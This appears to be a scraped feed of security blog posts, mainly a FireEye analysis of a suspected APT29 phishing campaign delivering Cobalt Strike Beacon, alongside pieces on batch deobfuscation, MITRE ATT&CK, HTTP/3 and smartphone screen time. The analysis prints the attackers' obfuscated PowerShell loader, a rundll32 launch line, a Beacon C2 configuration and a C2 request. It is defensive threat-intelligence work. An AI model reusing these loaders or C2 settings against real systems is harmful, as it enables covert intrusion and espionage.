  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Police arrest alleged Russian hacker behind huge Android ad scam

Police in Bulgaria have arrested an alleged Russian hacker who may be responsible for a huge Android ad scam that netted $10 million. The individual identified as Alexander Zhukov is a Saint Petersburg native who's been living in Varna, Bulgaria, since 2010 and was apprehended on November 6th after the US issued an international warrant for his arrest, according to ZDNet.

Source: Kommersant

McAfee Leads the Charge to Embrace and Expand the MITRE ATT&CK Framework

In October, I was privileged to attend the two-day MITRE ATT&CK™ conference, where participants and attendees voiced their support for the ATT&CK framework. The event, sponsored by McAfee, served as a forum for sharing insights and best practices for using ATT&CK as a way to describe and demystify the complexities of today’s cyberattacks. MITRE is well known for its threat-based research in cybersecurity, including highly adopted standards and tools like STIX/TAXII and Common Vulnerability Exposure (CVE).

What is the MITRE ATT&CK framework? Why is it so important to the security community?

ATT&CK is a publicly accessible knowledgebase of adversary tactics and techniques based on real-world observations. For the first time ever, the vendor-agnostic ATT&CK framework enables us to standardize the threat intelligence-sharing process and describe how adversaries prepare for, launch, and execute their attacks. Armed with this knowledge, both security vendors and customers can work toward improving their detection and prevention methods.

What makes ATT&CK so robust is the large community of contributors. By making ATT&CK content available to every practitioner worldwide, MITRE has created a growing community that is fostering innovation in open source tools, products, and services based on the framework.

Best of all, ATT&CK provides a common, easy-to-understand language that can be consumed in bite-size chunks. It enables practitioners to explain complex concepts to management and customers by relating the security risks to business.

How are organizations using the ATT&CK framework?

Speakers representing a wide spectrum of organizations—from the government, private sector, and security arena—shared ways in which they are benefitting from ATT&CK:

  • Building industry-specific threat profiles and doing adversary emulation through red teaming: By acting like real-life adversaries, red teams perform penetration testing using threat-specific techniques to detect network and system vulnerabilities and to test the efficacy of security tools. This enables organizations to answer questions that are critical for their security operations team:
    • Is my organization a target, and what kinds of groups are targeting us?
    • How do these adversarial groups operate?
    • Have we seen the adversary before?
    • What is their motivation? What is the potential impact to my organization?

By using ATT&CK, red teams, who are doing the attacking, can easily communicate with and share their findings with blue teams, who are doing the defending.

  • Red team automation at the unit, or atomic test, level: Recently, several assessment tools have emerged that automate testing of detection and prevention on a granular level against a wide range of adversarial techniques identified by ATT&CK. Gartner expects that these tools will gain ground in security operations and may supplant traditional penetration testing.1
  • Operationalization of intelligence at a tactical level: Large companies with mature security operations organizations are using ATT&CK as a framework to drive their ongoing security operations center (SOC) activities. Specifically, they are using ATT&CK in the following ways:
    • Improving their detection capabilities by engineering new content to feed into their security information and event management (SIEM) solution, intrusion detection system (IDS), and intrusion prevention system (IPS)
    • Creating hypotheses for hunting adversaries on the network
    • Tracking adversary groups using tactics, techniques, and procedures (TTPs) for SOC processes, such as network security management, forensics, and others
    • Combining ATT&CK with vulnerability management and configuration management to drive overall risk management initiatives, such as prioritizing security architecture and control gaps

What is our role in driving ATT&CK forward?
McAfee is collaborating closely with MITRE in extending their ATT&CK techniques and aligning our products to show coverage and context based on this framework. Both participants and attendees at the conference agreed that ATT&CK is a necessary component for a viable enterprise security strategy.

At our booth, we demonstrated how we have incorporated ATT&CK into McAfee MVISION Endpoint Detection and Response (MVISION EDR), which is scheduled for Q1 2019 availability. Visitors were impressed with how detection is based on and mapped to the ATT&CK framework, allowing a faster, more consistent process to determine the phases of a threat, assess associated risk, and prioritize response.

With our expanded expertise in EDR, threat intelligence, threat hunting, and the cloud, we have identified multiple opportunities to further our collaboration with MITRE.

We also plan on becoming even more involved with the MITRE ATT&CK community through active participation in practitioners’ forums and events like this conference. We are launching new initiatives to enable us to contribute to the ATT&CK knowledgebase by publishing and sharing our research and learnings about new adversarial techniques, incident response methodologies, and red teaming processes.

If you were unable to attend, you can view videos of the ATT&CK conference sessions on YouTube.

To learn more about MITRE ATT&CK, check out resources that we have published on this topic:

 

1 Gartner, 2018. “BAS and Red Teams Will Kill the Pentest.” https://blogs.gartner.com/augusto-barros/2018/02/14/bas-and-red-teams-will-kill-the-pentest/.

 

The post McAfee Leads the Charge to Embrace and Expand the MITRE ATT&CK Framework appeared first on McAfee Blogs.

Thanks for Giving, Emotet!

Emotet – the banking Trojan turned malware delivery platform – has recently been observed altering its behaviour in some interesting ways. After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.].com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

Time

Event

Source

2018-10-15 15:35:19Z

pandorasong[.]com registered

Registrant Information

2018-10-15 17:39:00Z

pandorasong[.]com SSL certificate established

Certificate Transparency

2018-10-15 18:52:06Z

Cobalt Strike server established

Scan Data

2018-11-02 10:25:58Z

LNK Weaponized

LNK Metadata

2018-11-13 17:58:41Z

3fccf531ff0ae6fedd7c586774b17a2d modified

Archive Metadata

2018-11-14 01:48:34Z

658c6fe38f95995fa8dc8f6cfe41df7b modified

Archive Metadata

2018-11-14 08:23:10Z

First observed phishing e-mail sent

Telemetry

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF") Invoke-Item
$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat") if
($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",")
$("PointFunctionCall") }

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile. The profile may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

Indicator

Description

dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36
928202aa46271691a8255aaa15382822aa25821925a
0245@northshorehealthgm[.]org

Phishing email address from likely compromised legitimate server

Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you

Phishing email subject

https://www.jmj[.]com/personal/nauerthn_state_gov/*

Malware hosting location on likely compromised legitimate domain

pandorasong[.]com

BEACON C2

95.216.59[.]92

Resolution of pandorasong[.]com

2b13b244aafe1ecace61ea1119a1b2ee

SSL certificate for pandorasong[.]com

3fccf531ff0ae6fedd7c586774b17a2d

Malicious ZIP archive MD5

658c6fe38f95995fa8dc8f6cfe41df7b

Benign ZIP archive MD5

6ed0020b0851fb71d5b0076f4ee95f3c

Malicious LNK file MD5

313f4808aa2a2073005d219bc68971cd

Benign decoy PDF MD5

16bbc967a8b6a365871a05c74a4f345b

BEACON DLL MD5

%APPDATA%\Local\cyzfc.dat

BEACON DLL file path

%TEMP%\ds7002.PDF

Benign decoy PDF file path

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

Product

Detection names

Network Security

Malware.Archive
Malware.Binary.lnk
Suspicious.Backdoor.Beacon

Endpoint Security

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Generic.mg.16bbc967a8b6a365

Threat Analytics Platform

WINDOWS METHODOLOGY [PowerShell Base64 String]
WINDOWS METHODOLOGY [Rundll32 Roaming]
WINDOWS METHODOLOGY [PowerShell Script Block Warning]
WINDOWS METHODOLOGY [Base64 Char Args]
TADPOLE DOWNLOADER [Rundll Args]
INTEL HIT - IP [Structured Threat Reputation-Based]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]
INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]
INTEL HIT - FILE HASH [Structured Threat Reputation-Based]

Table 3: FireEye product detections

Over 120 Malicious Domains Discovered in Analysis on New Roaming Mantis Campaign

Since April of this year, news of a rapidly evolving crypto mining malware, dubbed Roaming Mantis, has hit the cyber news headlines. Roaming Mantis debuted with a DNS hijacking attack vector, infecting android running machines. Once installed, the malware redirected infected devices to phishing sites by spoofing legitimate applications, while using the stolen credentials to run a crypto mining script on PCs.

Quick Take: The Developer’s Role in the Future of Secure Software Development

state of software security developer role in secure software

The State of Software Security Volume 9 offers some of the most dramatic and concrete evidence to date on the positive effect DevSecOps practices have on the  state of software security. The data showed consistently that the more an organization scans per year, the faster security fixes are made. The frequent, incremental changes brought forth by DevSecOps makes it possible for these teams to fix flaws lightning fast compared to the traditional dev team.

 

To learn more and read the full report, visit www.veracode.com/soss

Some notes about HTTP/3

HTTP/3 is going to be standardized. As an old protocol guy, I thought I'd write up some comments.

Google (pbuh) has both the most popular web browser (Chrome) and the two most popular websites (#1 Google.com #2 Youtube.com). Therefore, they are in control of future web protocol development. Their first upgrade they called SPDY (pronounced "speedy"), which was eventually standardized as the second version of HTTP, or HTTP/2. Their second upgrade they called QUIC (pronounced "quick"), which is being standardized as HTTP/3.


SPDY (HTTP/2) is already supported by the major web browser (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL. While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.

There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone that now that it's standardized that people can start using it.

QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.

The major headline feature is faster connection setup and latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get setup faster, so that when you click on a link, the linked resource pops up immediately

The next headline feature is bandwidth. There is always a bandwidth limitation between source and destination of a network connection, which is almost always due to congestion. Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving transfer rate. Sending packets too slowly means unoptimal use of the network.

How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 6). However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation.

QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while at the same time reduce congestion that routers experience.

Now let's talk user-mode stacks. The problem with TCP, especially on the server, is that TCP connections are handled by the operating system kernel, while the service itself runs in usermode. Moving things across the kernel/usermode boundary causes performance issues. Tracking a large number of TCP connections causes scalability issues. Some people have tried putting the services into the kernel, to avoid the transitions, which is a bad because it destabilizes the operating system. My own solution, with the BlackICE IPS and masscan, was to use a usermode driver for the hardware, getting packets from the network chip directly to the usermode process, bypassing the kernel (see PoC||GTFO #15), using my own custom TCP stack. This has become popular in recent years with the DPDK kit.

But moving from TCP to UDP can get you much the same performance without usermode drivers. Instead of calling the well-known recv() function to receive a single packet at a time, you can call recvmmsg() to receive a bunch of UDP packets at once. It's still a kernel/usermode transition, but one amortized across a hundred packets received at once, rather a transition per packet.

In my own tests, you are limited to about 500,000 UDP packets/second using the typical recv() function, but with recvmmsg() and some other optimizations (multicore using RSS), you can get to 5,000,000 UDP packets/second on a low-end quad-core server. Since this scales well per core, moving to the beefy servers with 64 cores should improve things even further.

BTW, "RSS" is a feature of network hardware that splits incoming packets into multiple receive queues. The biggest problem with multi-core scalability is whenever two CPU cores need to read/modify the same thing at the same time, so sharing the same UDP queue of packets becomes the biggest bottleneck. Therefore, first Intel and then other Ethernet vendors added RSS giving each core it's own non-shared packet queue. Linux and then other operating systems upgraded UDP to support multiple file descriptors for a single socket (SO_REUSEPORT) to handle the multiple queues. Now QUIC uses those advances allowing each core to manage it's own stream of UDP packets without the scalability problems of sharing things with other CPU cores. I mention this because I personally had discussions with Intel hardware engineers about having multiple packet queues back in 2000. It's a common problem and an obvious solution, and it's been fun watching it progress over the last two decades until it appears on the top end as HTTP/3. Without RSS in the network hardware, it's unlikely QUIC would become a standard.

Another cool solution in QUIC is mobile support. As you move around with your notebook computer to different WiFI networks, or move around with your mobile phone, your IP address can change. The operating system and protocols don't gracefully close the old connections and open new ones. With QUIC, however, the identifier for a connection is not the traditional concept of a "socket" (the source/destination port/address protocol combination), but a 64-bit identifier assigned to the connection.

This means that as you move around, you can continue with a constant stream uninterrupted from YouTube even as your IP address changes, or continue with a video phone call without it being dropped. Internet engineers have been struggling with "mobile IP" for decades, trying to come up with a workable solution. They've focused on the end-to-end principle of somehow keeping a constant IP address as you moved around, which isn't a practical solution. It's fun to see QUIC/HTTP/3 finally solve this, with a working solution in the real world.

How can use use this new transport? For decades, the standard for network programing has been the transport layer API known as "sockets". That where you call functions like recv() to receive packets in your code. With QUIC/HTTP/3, we no longer have an operating-system transport-layer API. Instead, it's a higher layer feature that you use in something like the go programming language, or using Lua in the OpenResty nginx web server.

I mention this because one of the things that's missing from your education about the OSI Model is that it originally envisioned everyone writing to application layer (7) APIs instead of transport layer (4) APIs. There was supposed to be things like application service elements that would handling things like file transfer and messaging in a standard way for different applications. I think people are increasingly moving to that model, especially driven by Google with go, QUIC, protobufs, and so on.

I mention this because of the contrast between Google and Microsoft. Microsoft owns a popular operating system, so it's innovations are driven by what it can do within that operating system. Google's innovations are driven by what it can put on top of the operating system. Then there is Facebook and Amazon themselves which must innovate on top of (or outside of) the stack that Google provides them. The top 5 corporations in the world are, in order, Apple-Google-Microsoft-Amazon-Facebook, so where each one drives innovation is important.

Conclusion

When TCP was created in the 1970s, it was sublime. It handled things, like congestion, vastly better than competing protocols. For all that people claim IPv4 didn't anticipate things like having more than 4-billion addresses, it anticipated the modern Internet vastly better than competing designs throughout the 70s and 80s. The upgrade from IPv4 to IPv6 largely maintains what makes IP great. The upgrade from TCP to QUIC is similarly based on what makes TCP great, but extending it to modern needs. It's actually surprising TCP has lasted this long, and this well, without an upgrade.




Has Your Phone Become Your Third Child? Ways to Get Screen Time Anxiety Under Control

smartphone screen timeYou aren’t going to like this post. However, you will, hopefully, find yourself nodding and perhaps, even making some changes because of it. Here it friends: That love-hate relationship you have with your smartphone may need some serious attention — not tomorrow or next week — but now.

I’m lecturing myself first by the way. Thanks to the June iOS update that tracks and breaks down phone usage, I’m ready — eager in fact — to make some concrete changes to my digital habits. Why? Because the relationship with my phone – which by the way has become more like a third child — is costing me in time (75 days a year to be exact), stress, and personal goals.

I say this with much conviction because the numbers don’t lie. It’s official: I’m spending more time on my phone than I am with my kids. Likewise, the attention I give and the stress caused by my phone is equivalent to parenting another human. Sad, but true. Here’s the breakdown.

Screen time stats for the past seven days:

  • 5 hours per day on my device
  • 19 hours on social networks
  • 2 hours on productivity
  • 1 hour on creativity
  • 18 phone pickups a day; 2 pickups per hour

Do the math:

  • 35 hours a week on my device
  • 1,820 hours a year on my device
  • 75 days a year on my device

Those numbers are both accurate and disturbing. I’m not proud. Something’s gotta give and, as Michael Jackson once said, change needs to start with the man (woman) in the mirror.

A 2015 study by Pew Research Center found that 24% of Americans can’t stop checking their feeds constantly. No surprise, a handful of other studies confirm excessive phone use is linked to anxiety, depression, and a social phenomenon called FOMO, or Fear Of Missing Out.

Efficiency vs. Anxiety

There’s no argument around the benefits of technology. As parents, we can keep track of our kids’ whereabouts, filter their content, live in smart houses that are efficient and secure, and advance our skills and knowledge at lightning speeds.

That’s a lot of conveniences wrapped in even more pings, alerts, and notifications that can cause anxiety, sleeplessness, and stress.  In our hyper-connected culture, it’s not surprising to see this behavior in yourself or the people in your social circles.

  • Nervousness or anxiety when you are not able to check your notifications.
  • An overwhelming need to share things — photos, personal thoughts, stresses — with others on social media.
  • Withdrawal symptoms when you are not able to access social media.
  • Interrupting conversations to check social media accounts.
  • Lying (downplaying) to others about how much time you spend on social media sites.

We often promote balance in technology use, but this post will go one step further. This post will get uncomfortably specific in suggesting things to do to put a dent in your screentime. (Again, these suggested changes are aimed at this mom first.)

Get Intentional

